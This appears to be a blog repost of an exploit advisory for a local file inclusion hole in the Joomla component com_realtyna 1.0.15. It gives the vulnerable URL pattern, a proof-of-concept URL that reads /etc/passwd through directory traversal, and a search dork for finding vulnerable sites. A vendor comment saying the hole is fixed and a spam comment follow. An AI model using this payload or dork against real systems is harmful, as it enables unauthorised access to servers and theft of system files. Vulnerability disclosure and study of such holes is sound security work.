LFI to RCE via access_log injection

Joomla Component Realtyna Translator LFI Vuln

[o] Joomla Component Realtyna Translator Local File Inclusion Vulnerability
Software : com_realtyna version 1.0.15
Vendor : http://software.realtyna.com/
Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
Contact : public[at]antisecurity[dot]org
Home : http://antisecurity.org/


[o] Exploit
http://localhost/[path]/index.php?option=com_realtyna&controller=[LFI]


[o] PoC
http://localhost/index.php?option=com_realtyna&controller=../../../../../../../../../../etc/passwd


[o] Dork
inurl:"com_realtyna"


Comments

Raymond M said…
Hi,
I as the senior developer in realtyna would like to report that the vulnerability issue (remote file inclusion) is fixed in realtyna products. Our products were developed based on the tutorial on joomla documentation website ( http://docs.joomla.org/Developing_a_Model-View-Controller_Component_-_Part_1 ) and after we received the reports, we checked the site and saw that the code has changed for the controller section of the components.
All our clients can download the latest security patch from http://software.realtyna.com/index.php?option=com_realtynamanager&view=requestlatestversion by
We would be grateful if you remove the report from your website. (http://evilc0de.blogspot.com/2010/04/joomla-component-realtyna-translator.html)
labatterie said…
Our products were developed based on the tutorial on joomla documentation websit...
This is really a great post, Its the best blog and a quality source to get updated by some of the greatest facts,thanks


french translation services